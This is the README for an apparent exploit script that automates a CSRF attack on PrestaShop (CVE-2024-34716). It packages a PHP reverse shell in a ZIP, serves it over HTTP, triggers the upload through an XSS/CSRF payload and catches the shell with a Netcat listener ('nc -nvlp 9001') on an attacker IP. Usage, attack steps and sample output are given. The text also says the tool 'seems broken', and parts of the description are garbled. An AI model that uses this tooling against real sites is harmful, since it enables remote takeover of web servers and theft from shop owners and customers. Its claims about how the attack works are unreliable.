
Automates a CSRF attack against CVE-2024-34716 to deploy a PHP reverse shell on PrestaShop, with automated payload packaging and Netcat listener setup.
This script automates a CSRF (Cross-Site Request Forgery) exploit to upload a PHP reverse shell on a target's web server and execute it. The reverse shell is delivered as a ZIP file via a crafted CSRF payload, which is triggered when a privileged user interacts with a specific endpoint. The script requires a listening Netcat instance to capture the reverse shell connection.
Seems broken for now will update later
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
target_url: Base URL of the target (e.g., https://example.com).admin_endpoint: Path to the admin theme import endpoint.admin_email: Email address of an administrator (to spoof for the payload).attacker_ip: IP address where the reverse shell listener will receive the connection../exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
attacker_ip and port 9001.love.php) is compressed into Love-exploit.zip.csrf_payload.html) containing a JavaScript script to automatically submit a malicious request to the target's admin panel to import the reverse shell.8000 serves Love-exploit.zip for the target to import.Start a Netcat listener on your machine:
nc -nvlp 9001
Run the script:
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
Wait for the target to execute the CSRF payload and receive the reverse shell connection.
The script outputs the following information during execution:
8000 (HTTP server) and 9001 (Netcat listener) are free before running the script.[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
This document is intended for use by penetration testers and cybersecurity researchers in controlled environments. Misuse of this tool for unauthorized purposes is strictly prohibited.
This script is for educational purposes and legal cybersecurity assessments only. Unauthorized use against a system without permission is illegal and against ethical guidelines.